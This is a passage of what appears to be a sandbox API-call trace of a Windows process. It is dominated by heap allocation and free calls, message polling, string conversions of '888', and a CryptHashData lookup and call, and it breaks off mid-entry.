1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0225.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0225.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0225.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0225.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0225.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0225.393] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0225.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0225.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0225.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0225.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0225.440] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0225.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0225.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51478, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0225.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.442] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0225.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0225.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.442] CryptHashData (hHash=0xa87410, pbData=0x2e54fa8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0225.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0225.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0225.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.443] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0225.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.444] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0225.444] HeapFree (in: 